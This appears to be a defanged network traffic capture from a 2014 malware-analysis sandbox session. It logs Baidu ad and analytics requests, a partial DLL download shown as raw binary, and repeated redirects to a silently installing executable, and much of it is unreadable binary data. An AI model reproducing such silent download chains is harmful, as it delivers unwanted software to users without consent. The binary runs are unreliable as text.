h.-..z..g%.maYru.......C......j...{f7..h....,3bz...4)..N...C..N.$(.41.
k.4..........~.x|5.NzN...::..Q.d|....7...jEX...i8b./..........|X"...2.
....<..k..>..b....i..~opn9E....df.G......Yz...~.u...:........lH`
.......k2...[..&.B4.l&..`s*.Slf.....p....>....?;..Q.!...MT.s.......
@.rn.2..4JxH\u....!I..y...(.>J....Cu..r.2U......`....4.,.........q.
..BJ.R1J-.P#J..%...I..O..S:"#2..4tb....=.gv.M.u3..f..o..Z..%..lb J.-..
.M=.]&.$....q..4..Ng...|n.g,[.WfiY...v.sB../..4JLB...s=c..j).../.....Y
fZ]rL..)......h.......w..EZf.....()A.n@.. MB....9...L....$H........Yei
."[email protected]......{......L;.y..t`.5...< sfY;=jWS~
^S~......_.........!.......I....v<.n..L V.X....|39........R........
]......L..^r..{s^..|..{..5.u.1..{.5d..Im.....p#w.=5....{....#m...e.(..
...<...E.......uk.|./....w......>.U....1l_x...#40..;..$?.B.Xlr..
...[`..ZrS,!Z....H..A..I..i..8e]B.G .a.dQ2$.![[email protected]`.q...nl.N.p~..2
.C..[...w.`Yz..G.<(3N..8...H.Y^...6.d....h.,c..q:...mN.g..=<=?{x
$...R.A)koszny..#>.!P,M.....<..L...fE..~q...i....;..Z;X=.....G..
...)...R..%.Y..[..1./.D..,@S/......0........s'.r..O.$...Y.>.s......
[email protected].......~z.f.0..2.,$..?q.j...r...y.e...d..q-.?..c%...B......
.?..4.*N..j]0}..B. .v..=..\ /....e.%..w.Z..N.J.....'p.i^[email protected]>
<<< skipped >>>

GET /hm.gif?cc=1&ck=1&cl=32-bit&ds=1276x846&et=0&fl=11.6&ja=1&ln=en-us&lo=0&nv=1&rnd=2006558277&si=d1117fa0662883e59acd91ed0f03b7eb&st=1&v=1.0.59&lv=1&tt=五金 HTTP/1.1


Accept: */*
Referer: hXXp://VVV.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?spid=-37237366455960
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: hm.baidu.com
Connection: Keep-Alive
Cookie: HMACCOUNT=CEF89CEABD29A927; BAIDUID=D1F510B78251BF62B517A49EAEC89AE3:FG=1


HTTP/1.1 200 OK
Cache-Control: private, max-age=0, no-cache
Pragma: no-cache
Content-Type: image/gif
X-Content-Type-Options: nosniff
Connection: Keep-Alive
Content-Length: 43
Date: Fri, 13 Jun 2014 17:29:05 GMT
Server: apache
GIF89a.............!.......,...........L..;HTTP/1.1 200 OK..Cache-Cont
rol: private, max-age=0, no-cache..Pragma: no-cache..Content-Type: ima
ge/gif..X-Content-Type-Options: nosniff..Connection: Keep-Alive..Conte
nt-Length: 43..Date: Fri, 13 Jun 2014 17:29:05 GMT..Server: apache..GI
F89a.............!.......,...........L..;..



GET /sw-search-sp/client/dlljg1/BDMNet.dll HTTP/1.1
Accept: */*
Accept-Language: zh-CN,zh,en-US
Connection: Keep-Alive
Host: dlsw.baidu.com
Range: bytes=491520-
Referer: hXXp://dlsw.baidu.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)


HTTP/1.1 206 Partial Content
Server: JSP2/1.0.27
Date: Fri, 13 Jun 2014 17:29:10 GMT
Content-Type: application/x-msdownload
Connection: close
Content-Length: 753088
Content-Range: bytes 491520-1244607/1244608
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE
Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id
Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length
Accept-Ranges: bytes
Last-Modified: Wed, 21 Aug 2013 08:14:12 GMT
Expires: Sat, 14 Jun 2014 07:46:32 GMT
x-bs-version: 3DB44104797F6F34C7AB9E0A496537CC
ETag: 6812edbc825d28224d79d3645c9bb0f6
x-bs-request-id: MTAuMjE1Ljg4LjM2OjgwODA6MjQzNDMzNTU2MDoxMS9KdW4vMjAxNCAxNTo0NjozMiA=
x-bs-meta-crc32: 440605594
Content-MD5: 6812edbc825d28224d79d3645c9bb0f6
x-bs-client-ip: MTE1LjIzMS40Mi4xODE=
.D$$....t..........3..N.......F...D$$.....O$P............@;o |..t$,3.9
o(.l$.........l.N..F.;.}..........N.......N.N.;.u....Q....k........^.j
8.........D$....\$$t..........3..N.......^..D$$.....O,P...V....D$.....
 ;G(.D$...u....t$,3.9_0.............N..F.;.}..........N.......R.N.;.u.
...Q...}j........n.j..........D$....D$$....t..........3..N.......n..D$
$.....O4....h..H..P..W4.T........H..P.;_0..h....t$,3.9o8........,3..N.
.F.;.}..........N..O.N.;.u....Q....i...F..j0.V.......D$....D$$....t...
.......3..N.......F...D$$.....O<P............H;o8|..w......;.t.....
L$,W........co...L$.d......Y_^][......................S.\$.UVW...G..p.
.~)......|$..D$.uq.~$..n .t$$r..V....V..{.;.....r....{..r..C....C.QRP.
.R.......u.;.s......3.;............D$.t..6...v..~).t..|$..l$$.....t$..
|$.t>.G.;(.L$.u*SUj.Q......._.....D$..I.^].H..@....[......."....t$.
.{...S..N.r..C....C.R.Q.PRj...x....}..D$.SUP.L$ ...D$ .T$._.p.^].@....
[..........SUV...N...Wu.3....F. .....\$.;.s7..u.3....~. .....n.;.v....
...D$ P .SUV...O..._^][........tJ.n... ....;.s<;.v..m....~.;~.v..`.
...|$..<.;~.w.;~.s..J...UVWV.L$ Q......._^][...................SUV.
..N...Wu.3....F. .....\$.;.s4..u.3....~. .....n.;.v.......D$.P .SUV...
2..._^][.....tJ.n... ....;.s<;.v.......~.;~.v.......|$..<.;~.w.;
~.s......UVWV.L$(Q...]..._^][.........QSU.l$.V..W.~...t..F... ....u.3.
..;.v..H.....t.;.t..;....\$  .....T$$.D$ Rj.PU...{....~.;~.v.......|$ 
.<.;~.w.;~.s.......D$..x._.0^][Y..........QSU.l$.V..W.~...t..F... .
...u.3...;.v........t.;.t.......\$  .....T$$.D$ Rj.PU...K....~.;~.
<<< skipped >>>


GET /go/full/1/70745 HTTP/1.1
Accept: */*
Accept-Language: zh-CN,zh,en-US
Connection: Keep-Alive
Host: w.x.baidu.com
Range: bytes=15990784-
Referer: hXXp://w.x.baidu.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)


HTTP/1.1 302 Moved Temporarily
Server: nginx/1.4.3
Date: Fri, 13 Jun 2014 17:29:29 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.3.2
Location: hXXp://dl1sw.baidu.com/client/ws1215/0611/BaiduAn_Setup_1.0.647.511_Sid_55555_Silent_Defense.exe



GET /json/btns1/btns.js HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: web.mny8.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: application/x-javascript
Content-Encoding: gzip
Last-Modified: Tue, 06 May 2014 07:48:53 GMT
Accept-Ranges: bytes
ETag: "80a028a0ff68cf1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Fri, 13 Jun 2014 17:28:09 GMT
Content-Length: 398
.............N.0........O..c....`....*-..1...-......}...........;X>
.A...T.YR.:]..B..f.......K%.{.)^...X.....4...`E...0Y.r&..n.T.......\.\
...(....:.ld...z'J..y......$].a..@..?.d.$5?pZ..*...bh.14...j=....j.x..
/..^.k..>qaUeU.9T..3..!`7..|J.|....}_./.NY.`./..E.g0}.^L....]..K...
.K........:..l.....x..|...".b..Fl.......2n...9:_.....Gs.GSr...M.....4y
.|..X..U&..CW...E..@.....'f...L8..&.V.X..,..c.........HTTP/1.1 200 OK.
.Content-Type: application/x-javascript..Content-Encoding: gzip..Last-
Modified: Tue, 06 May 2014 07:48:53 GMT..Accept-Ranges: bytes..ETag: "
80a028a0ff68cf1:0"..Vary: Accept-Encoding..Server: Microsoft-IIS/7.5..
X-Powered-By: ASP.NET..Date: Fri, 13 Jun 2014 17:28:09 GMT..Content-Le
ngth: 398...............N.0........O..c....`....*-..1...-......}......
.....;X>.A...T.YR.:]..B..f.......K%.{.)^...X.....4...`E...0Y.r&..n.
T.......\.\...(....:.ld...z'J..y......$].a..@..?.d.$5?pZ..*...bh.14...
j=....j.x../..^.k..>qaUeU.9T..3..!`7..|J.|....}_./.NY.`./..E.g0}.^L
....]..K....K........:..l.....x..|...".b..Fl.......2n...9:_.....Gs.GSr
...M.....4y.|..X..U&..CW...E..@.....'f...L8..&.V.X..,..c...........



GET /aj/static/sync.html?t=1402680571713 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Referer: hXXp://pos.baidu.com/ecom?cec=utf-8&dai=1&cfv=11&cpa=1&col=en-us&dis=0&xuanting=0&n=67025059_1_cpr&conOP=0&scale=&skin=&rsi0=336&rsi1=280&rsi5=4<r=http://VVV.mnh.quzhao.com/x/mnh/mini/q428/mnh_428cc.html<u=http://VVV.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?1?id=0&pcs=758x450&rss0=#FFFFFF&rss1=#FFFFFF&rss2=#0000FF&rss3=#444444&rss4=#008000&rss5=&rss6=#e10900&rss7=&rad=&pis=10000x10000&aurl=&psr=1276x846&pss=758x493&tpr=1402680568181&lunum=6&ch=0&at=6&qn=b4429549b809eb77&ps=-2x-2&tn=text_default_336_280&ts=1&td_id=1537509&adn=3&cad=1&ccd=32&dtm=BAIDU_DUP2_SETJSONADSLOT&dc=2&di=u1537509
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: weibo.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: WeiBo
Date: Fri, 13 Jun 2014 17:29:27 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Last-Modified: Thu, 20 Feb 2014 11:15:36 GMT
Vary: Accept-Encoding
Expires: Fri, 13 Jun 2014 17:31:27 GMT
Cache-Control: max-age=120
DPOOL_HEADER: jason173
Content-Encoding: gzip
Set-Cookie: YF-V5-G0=a0e87040bfaca9b1b05c465a9e888d2d;Path=/
LB_HEADER: venus243
4bf.............VMo.D.>'.b.U.{K=....i.iW..B..*(.F.=I.Ml..l..\..hO\8
P!.. ...........}....... ..g.y.g....n....~vvB&r6%g...>....cW.;..w..
..v....Q'..rC!..ZS.N>...DJ....ba,..^0f.sv.\....=.A..tjG.Ce.z6u.V.Mc
..?B...r..BN.Q(\..K.&.5..,....x..s...v |I...-*..d.[O.h..U.<O..8.'-B
..\.=..fl........mV .2.....".1.7.LfF.M.gLD....`R....t.j.!|...%.9...l?.
LC.)2$.`.s.~...h..i..h2.J.Ho..C.....2Z..YU.GPQ$H1. ....a...z..,#W..@.[
a.{[email protected]*{.e......h...@Z.._..F-...a..#........i.=.on.u6~.P.4
..To..(0> ]. .||r. n.KhK.=n....&..(.l.`.g.g....%.`MZ.....1..=..\.H.
.....D....Eh..'...V.`V.OC^.... .[....p..9.. .A.....]..&R*.;..{.#.W. ..
....%.H..F^...O...V.9 b..,...!y(...A.IO.W2..M. ....(S..cX......../I...
f..U...dY......./.........P.(.r.....F.X8w..4(UT..7..-.=....#..f.~.Q...
-..m..j.s..|..Ng"..F..pK..).7........6....Jeg [.:....1,.t(..De...Mm...
\..RY."..K.w;...*.=._.?.x3.sQUz.h.....EE.cH.8.......~.Wg"S..DF4l .....
.5.....E........h).....g...>.4.erR..L. b".....m....d]..........?...
....^.........w..w/_.<...n...,..!...L.B"0.......6.........M....&J..
&}[lT..r^ID*X&Zr...e.tu....7<7.b....RI\...o..~z}.......Qy..q....sk.
.........m.3...b.u.%.M.-..8o*.....m..}....Z..C......Y.!...3%..:S...kW.
.[...Q....#T.Dh...7...D..b|y.(..E...y..W.O...?]..%:.....0..
<<< skipped >>>


GET /go/full/1/70745 HTTP/1.1
Accept: */*
Accept-Language: zh-CN,zh,en-US
Connection: Keep-Alive
Host: w.x.baidu.com
Range: bytes=17039360-
Referer: hXXp://w.x.baidu.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)


HTTP/1.1 302 Moved Temporarily
Server: nginx/1.4.3
Date: Fri, 13 Jun 2014 17:29:36 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.3.2
Location: hXXp://dl1sw.baidu.com/client/ws1215/0611/BaiduAn_Setup_1.0.647.511_Sid_55555_Silent_Defense.exe



GET /media/v1/0f0002dsZ58R_Ik2MbXxd0.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: hXXp://ubmcmm.baidustatic.com/media/v1/0f0002EBaHfWMpy9Ew2v2s.swf?url_type=1&id_555316071=media/v1/0f000rmn6cn7D14hDeZLyf.gif&id_5553832
x-flash-version: 11,6,602,168
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ubmcmm.baidustatic.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: JSP2/1.0.27
Date: Fri, 13 Jun 2014 17:29:17 GMT
Content-Type: image/jpeg
Connection: close
Content-Length: 10408
Cache-Control: max-age=31536000
Expires: Sat, 28 Mar 2015 04:06:01 GMT
Last-Modified: Sat, 25 Apr 2009 07:04:00 GMT
media: media
......JFIF.....`.`.....C..............................................
......................C...............................................
........................;...."........................................
....................}........!1A..Qa."q.2....#B...R..$3br........%&'()
*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................
......................................................................
..........................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.
....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz.......................
.............................................................?..S..F;A
'.........N..W..Y.....I...uA?.N~).(dYnM...I.....3...~"...e.]b!o./.;...
N.._s:. ......._h.kE....6..H. .0...Z...)tO.eie..2..D]Si.-....i...;....
..h.."....7M.....(.?....|.7.B#.3.0<V..... )n...X.7.$.. .~Py?.z.9...
.Z5c'.......I^..^j.....|W.-.M..K....dh[.-..#...A.]N.z...w.......2.9...
WC...I..E&....{.S.Z.R......Ee.~%..=.M.u..(.......e....t.U.q..Kc!M....{
......f........w.y...Z.y..c...t?.i.".f.....dll..B.i..;E,[email protected].
.a$.....T...IY.,.\r.V..#..X.......u..A...>'iM..[}M.....N..Gb.&...p,
./.......t..)oM.....GK....f..kK..i...c.n.#....0..>..Xy.%....U.V.J.\
_..QE..b.QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..Q
E..QE..QE..QE..QE..QE..QE..QE.........E.p..<.....F..A..fK.l..'j.g.1
.q........\={../..Z......*...C..........8..K..a..U....Q.......xf..9.j.
7.[.Q.N.......4......}>$x.pG.?#.{UO.....^......9.@$....m.....kg.?.'
....... n.P.a)O......_..z..|...^qU(..._...g...<.<.....n.ns=.
<<< skipped >>>


GET /crossdomain.xml HTTP/1.1
Accept: */*
Accept-Language: en-US
x-flash-version: 11,6,602,168
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: resource.dl.kukuplay.com
Connection: Keep-Alive


HTTP/1.0 200 OK
Content-Type: text/xml
Content-Length: 257
Accept-Ranges: bytes
Server: pws/1.4.2.9
Date: Fri, 13 Jun 2014 16:20:09 GMT
Last-Modified: Tue, 26 Jun 2012 13:04:28 GMT
ETag: "4fe9b35c-101"
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Cache-Control: max-age=315360000
Age: 4155
X-Cache: HIT from CT-ZJWZ-251-106.fastcdn.com
Connection: keep-alive
<?xml version="1.0"?>.<!DOCTYPE cross-domain-policy SYSTEM "/
xml/dtds/cross-domain-policy.dtd">.<cross-domain-policy> .   
<site-control permitted-cross-domain-policies="master-only"/>.  
 <allow-access-from domain="*" to-ports="*" />.</cross-domain
-policy>..HTTP/1.0 200 OK..Content-Type: text/xml..Content-Length: 
257..Accept-Ranges: bytes..Server: pws/1.4.2.9..Date: Fri, 13 Jun 2014
 16:20:09 GMT..Last-Modified: Tue, 26 Jun 2012 13:04:28 GMT..ETag: "4f
e9b35c-101"..Expires: Thu, 31 Dec 2037 23:55:55 GMT..Cache-Control: ma
x-age=315360000..Age: 4155..X-Cache: HIT from CT-ZJWZ-251-106.fastcdn.
com..Connection: keep-alive..<?xml version="1.0"?>.<!DOCTYPE 
cross-domain-policy SYSTEM "/xml/dtds/cross-domain-policy.dtd">.<
;cross-domain-policy> .   <site-control permitted-cross-domain-p
olicies="master-only"/>.   <allow-access-from domain="*" to-port
s="*" />.</cross-domain-policy>......


GET /upload/logoyanyi.FLV HTTP/1.1


Accept: */*
Accept-Language: en-US
Referer: hXXp://resource.ws.kukuplay.com/[[IMPORT]]/resource.dl.kukuplay.com/upload/fishrlv31.swf
x-flash-version: 11,6,602,168
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: resource.dl.kukuplay.com
Connection: Keep-Alive


HTTP/1.0 200 OK
Server: pws/1.4.2.9
Date: Mon, 26 May 2014 20:41:11 GMT
Content-Type: video/x-flv
Content-Length: 917990
Last-Modified: Tue, 14 Jan 2014 08:55:19 GMT
ETag: "52d4fb77-e01e6"
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Cache-Control: max-age=315360000
Accept-Ranges: bytes
Age: 112742
X-Cache: HIT from CT-ZJWZ-251-106.fastcdn.com
Connection: keep-alive
FLV........................onMetaData.......duration.@.........width.@
.........height.@~........videodatarate...........framerate.@9........
[email protected][email protected].@0...
.....stereo....audiocodecid.@$........filesize.A,................*....
[email protected].....................
..................e...._.?.....&........0...c-..}..}..}..}..}..}..}..}
..}..}..}..}...&.$.c.GQ..........................................nL}..
|.......\.\....................................................7...o.&
lt;........r.._......mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm.
..nXp..c..b.....d......~..............................................
........._.u.{ .}..}..}..}..}..}..}..}..}..}..}..}.....q..$-.........A
...K...|d......Kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk...u.
...(.k.2......~.e.....................................................
..z.u.:..Y::....K..K...kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk
kk...q.A.......h...&D&C.X}.......a.-..................................
...................P.c...........................................n=RX8
:.X9QV.jXv..v..j[[[[[[[[[[[[[[[[[[[X.TU.KEE....>-fEY3,.......mmmmmm
mmmmmmmmmmmmmmmmmmmmmm...n4....y\...x.r.._..,>.....................
..r.xfW.5E..1:.8.1..mpG..L.xl......fDb......H0|z....C...%k.<...p.2.
.7*i........~.@.,..... .7.......av.2..{<.,S|..r...!:...#.eT.4n*..2.
h......N...v. 3r..x.0.......6.l...[... ......p...x....%..........Q.. |
N'X.x....j)C.....8......../..4{.....#M.......QW..../..r...........
<<< skipped >>>


GET /ecom?di=u1537509&dcb=BAIDU_DUP2_define&dtm=BAIDU_DUP2_SETJSONADSLOT&dbv=0&dci=0&dri=0&dis=0&dai=1&dds=&drs=3&dvi=1401358918<u=http://VVV.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?spid=-37237366455960&liu=<r=&lcr=&ps=-2x-2&psr=1276x846&par=1276x818&pcs=758x450&pss=758x493&pis=-1x-1&cfv=11&ccd=32&chi=0&cja=true&cpl=0&cmi=0&cce=true&col=en-us&cec=utf-8&cdo=-1&tsr=156&tlm=1398686606&tcn=1402680537&tpr=1402680537275&dpt=none&coa=&baidu_id= HTTP/1.1
Accept: */*
Referer: hXXp://VVV.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?spid=-37237366455960
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: pos.baidu.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 13 Jun 2014 17:28:53 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 1202
Connection: Keep-Alive
Set-Cookie: BAIDUID=49F93F86C60D03A8D23F3919153C48A7:FG=1; expires=Sat, 13-Jun-45 17:28:53 GMT; max-age=31536000; path=/; domian=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
P3P: CP=" OTI DSP COR IVA OUR IND COM "
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat Jun 14 01:28:53 2014
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
BAIDU_DUP2_define('request!u1537509_0',[],{deps:['nova/painter/inlayFi
xed1392089005'],data:{"id" : "u1537509","_isMlt" : 4,"sw" : 336,"sh" :
 280,"_html" : {"cec":"utf-8", "dai":"1", "cfv":"11", "cpa":"1", "col"
:"en-us", "dis":"0", "xuanting":"0", "n":"67025059_1_cpr", "conOP":"0"
, "scale":"", "skin":"", "rsi0":"336", "rsi1":"280", "rsi5":"4", "ltr"
:"", "ltu":"hXXp://VVV.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.htm
l?spid=-37237366455960", "pcs":"758x450", "rss0":"#FFFFFF", "rss1":"#F
FFFFF", "rss2":"#0000FF", "rss3":"#444444", "rss4":"#008000", "rss5":"
", "rss6":"#e10900", "rss7":"", "rad":"", "pis":"10000x10000", "aurl":
"", "psr":"1276x846", "pss":"758x493", "tpr":"1402680537275", "lunum":
"6", "ch":"0", "at":"6", "qn":"cadbaab171a45209", "ps":"-2x-2", "tn":"
text_default_336_280", "ts":"1", "td_id":"1537509", "adn":"3", "cad":"
1", "ccd":"32"},"_html_old" : "cpro_client=67025059_1_cpr|cpro_templat
e=text_default_336_280|cpro_lunum=6|cpro_h=280|cpro_w=336|cpro_xuantin
g=0|cpro_at=image|cpro_cbd=#FFFFFF|cpro_cbg=#FFFFFF|cpro_ctitle=#0000F
F|cpro_cdesc=#444444|cpro_curl=#008000|cpro_cflush=#e10900|cpro_161=3|
cpro_flush=4|cpro_cad=1","qn" : "cadbaab171a45209","_qid" : "cadbaab17
1a45209"}});....
<<< skipped >>>

GET /ecom?cec=utf-8&dai=1&cfv=11&cpa=1&col=en-us&dis=0&xuanting=0&n=67025059_1_cpr&conOP=0&scale=&skin=&rsi0=336&rsi1=280&rsi5=4&ltr=&ltu=http://VVV.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?spid=-37237366455960&pcs=758x450&rss0=#FFFFFF&rss1=#FFFFFF&rss2=#0000FF&rss3=#444444&rss4=#008000&rss5=&rss6=#e10900&rss7=&rad=&pis=10000x10000&aurl=&psr=1276x846&pss=758x493&tpr=1402680537275&lunum=6&ch=0&at=6&qn=cadbaab171a45209&ps=-2x-2&tn=text_default_336_280&ts=1&td_id=1537509&adn=3&cad=1&ccd=32&dtm=BAIDU_DUP2_SETJSONADSLOT&dc=2&di=u1537509 HTTP/1.1


Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Referer: hXXp://VVV.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?spid=-37237366455960
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: pos.baidu.com
Connection: Keep-Alive
Cookie: BAIDUID=49F93F86C60D03A8D23F3919153C48A7:FG=1


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 13 Jun 2014 17:28:55 GMT
Content-Type: text/html
Content-Length: 10952
Connection: Keep-Alive
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat Jun 14 01:28:55 2014
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP=" OTI DSP COR IVA OUR IND COM "
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xm
lns="hXXp://VVV.w3.org/1999/xhtml">..<head>..<!-- 0|1; --&
gt;..<meta http-equiv="Content-Type" content="text/html; charset=UT
F-8" />..<meta http-equiv="X-UA-Compatible" content="IE=7" />
..<title>..............................</title>..<scrip
t language="javascript" src="hXXp://cpro.baidu.com/extra/text_flash/AC
_RunActiveContent.js"></script>..<style>..body{margin:0
;padding:0;}...uptown{position:relative;width:336px;height:280px;}...u
ptown #dish0{width:336px;height:280px;position:absolute;top:0;left:0;b
ackground-color:#fff;opacity:0;filter:alpha(opacity=0);}...uptown #dis
h1{width:336px;height:280px;position:absolute;top:0;left:0;border:#FFF
FFF solid 1px; }..a.logo{display:block;height:18px;width:26px;text-ali
gn:justify;letter-spacing:20px;text-decoration:none;overflow:hidden;cu
rsor:default;position:absolute;bottom:0px;right:0px;z-index:10;}...cpr
o a.logo{filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(ena
bled=true, src="hXXp://cpro.baidu.com/img/cpro_media_small.png", sizin
gMethod="image");background:url(hXXp://cpro.baidu.com/img/cpro_media_s
mall.png) no-repeat left top;*background:none;}...cpro a.logo:hover{wi
dth:78px;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(ena
bled=true, src="hXXp://cpro.baidu.com/img/cpro_media_large.png", sizin
gMethod="image");background:url(hXXp://cpro.baidu.com/img/cpro_med
<<< skipped >>>

GET /ecom?di=u1537511&dcb=BAIDU_DUP2_define&dtm=BAIDU_DUP2_SETJSONADSLOT&dbv=0&dci=0&dri=0&dis=0&dai=2&dds=&drs=3&dvi=1401358918&ltu=http://VVV.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?spid=-37237366455960&liu=&ltr=&lcr=&ps=-2x-2&psr=1276x846&par=1276x818&pcs=758x450&pss=758x493&pis=-1x-1&cfv=11&ccd=32&chi=0&cja=true&cpl=0&cmi=0&cce=true&col=en-us&cec=utf-8&cdo=-1&tsr=5703&tlm=1398686606&tcn=1402680543&tpr=1402680537275&dpt=none&coa=&baidu_id= HTTP/1.1


Accept: */*
Referer: hXXp://VVV.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?spid=-37237366455960
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: pos.baidu.com
Connection: Keep-Alive
Cookie: BAIDUID=49F93F86C60D03A8D23F3919153C48A7:FG=1


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 13 Jun 2014 17:28:57 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 1202
Connection: Keep-Alive
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat Jun 14 01:28:57 2014
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP=" OTI DSP COR IVA OUR IND COM "
BAIDU_DUP2_define('request!u1537511_0',[],{deps:['nova/painter/inlayFi
xed1392089005'],data:{"id" : "u1537511","_isMlt" : 4,"sw" : 336,"sh" :
 280,"_html" : {"cec":"utf-8", "dai":"2", "cfv":"11", "cpa":"1", "col"
:"en-us", "dis":"0", "xuanting":"0", "n":"67025059_1_cpr", "conOP":"0"
, "scale":"", "skin":"", "rsi0":"336", "rsi1":"280", "rsi5":"4", "ltr"
:"", "ltu":"hXXp://VVV.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.htm
l?spid=-37237366455960", "pcs":"758x450", "rss0":"#FFFFFF", "rss1":"#F
FFFFF", "rss2":"#0000FF", "rss3":"#444444", "rss4":"#008000", "rss5":"
", "rss6":"#e10900", "rss7":"", "rad":"", "pis":"10000x10000", "aurl":
"", "psr":"1276x846", "pss":"758x493", "tpr":"1402680537275", "lunum":
"6", "ch":"0", "at":"6", "qn":"6dc8052231d438f7", "ps":"-2x-2", "tn":"
text_default_336_280", "ts":"1", "td_id":"1537511", "adn":"3", "cad":"
1", "ccd":"32"},"_html_old" : "cpro_client=67025059_1_cpr|cpro_templat
e=text_default_336_280|cpro_lunum=6|cpro_h=280|cpro_w=336|cpro_xuantin
g=0|cpro_at=image|cpro_cbd=#FFFFFF|cpro_cbg=#FFFFFF|cpro_ctitle=#0000F
